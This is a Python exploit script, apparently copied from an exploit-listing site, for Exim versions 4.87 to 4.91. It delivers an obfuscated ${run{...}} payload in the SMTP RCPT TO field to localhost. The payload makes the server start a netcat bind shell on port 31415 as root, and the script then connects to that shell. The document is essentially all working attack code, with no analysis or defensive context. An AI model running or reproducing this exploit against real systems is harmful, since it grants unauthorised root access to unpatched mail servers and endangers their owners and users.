Share
## https://sploitus.com/exploit?id=PACKETSTORM:220563
#
    # Spawns a netcat shell on port 31415 as root, then connects to it
    # Vulnerablity is within Exim 4.87-4.91
    #
    
    import subprocess
    import socket
    import os
    import time
    from subprocess import Popen, PIPE
    
    payload = b'${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31415\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'
    myhost = os.uname()[1]
    proc = subprocess.Popen(["nc", "localhost", "25"], stdin=PIPE, stdout=PIPE)
    
    stdout = (repr(proc.stdout.readline()))
    print(stdout)
    
    if ("220" in stdout): #Wait for 220 so we can start sending commands
        proc.stdin.write((b'HELO ') + myhost.encode() + b'\n')
        proc.stdin.flush()
        print(repr(proc.stdout.readline()))
    
        proc.stdin.write(b'MAIL FROM:<>\n')
        proc.stdin.flush()
        print(repr(proc.stdout.readline()))
    
        proc.stdin.write(b'RCPT TO:<'+ payload + b'>\n')
        proc.stdin.flush()
        print(repr(proc.stdout.readline()))
        
        proc.stdin.write(b'DATA\n')
        proc.stdin.flush()
        print(repr(proc.stdout.readline()))
    
        for i in range(1,32):
          proc.stdin.write(b'Received:' + b' ' + bytes(i) + b'\n')   
          proc.stdin.flush()
          #print(i)
      
        proc.stdin.write(b'\n.\n')
        proc.stdin.flush()
        print(repr(proc.stdout.readline()))
      
        proc.stdin.write(b'QUIT\n')
        proc.stdin.flush()
        print(repr(proc.stdout.readline()))
    
    time.sleep(1)
    print("[+] Dropping into shell...")
    os.system("nc localhost 31415")